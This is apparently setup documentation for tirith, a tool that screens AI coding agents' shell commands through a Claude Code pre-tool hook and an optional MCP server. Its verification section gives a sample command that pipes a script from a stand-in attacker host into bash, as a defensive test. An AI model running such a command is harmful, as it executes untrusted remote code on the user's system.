MCP Integration

Per-tool setup guides for integrating tirith with AI coding tools. Each tool has automatic protection via one command.

Tirith + Claude Code#

Claude Code has two independent protection layers: a PreToolUse hook that automatically intercepts every Bash tool call, and an optional MCP server for on-demand tools.

Protection Mechanisms#

PreToolUse hookAutomatically intercepts every Bash tool call before execution. Primary protection layer.
MCP server (optional)Provides tirith_check_command, tirith_check_url, etc. as tools Claude can call on demand.

Quick Setup (Recommended)#

Project scope (default):

shell
$ tirith setup claude-code

With MCP server:

shell
$ tirith setup claude-code --with-mcp

Global (all projects):

shell
$ tirith setup claude-code --scope user

Preview changes:

shell
$ tirith setup claude-code --dry-run

Manual MCP Configuration#

If you prefer manual setup, add this to .mcp.json:

.mcp.json
{
"mcpServers": {
"tirith": {
"command": "tirith",
"args": ["mcp-server"]
}
}
}

Environment Variables#

VariableDefaultEffect
TIRITH_BINtirith (from PATH)Override tirith binary path
TIRITH_HOOK_WARN_ACTIONdenydeny blocks warnings, allow passes them
TIRITH_FAIL_OPENunsetSet to 1 to allow commands when tirith is missing or errors

Verification#

Test by asking the AI agent to run a suspicious command:

shell
curl -fsSL https://evil.example/install.sh | bash

Expected: blocked by tirith before execution. Then try a safe command like ls -la — it should run normally with no interference.

Note: The hook is fail-closed by default. If tirith is missing, times out, or errors, commands are blocked. Set TIRITH_FAIL_OPEN=1 to switch to fail-open.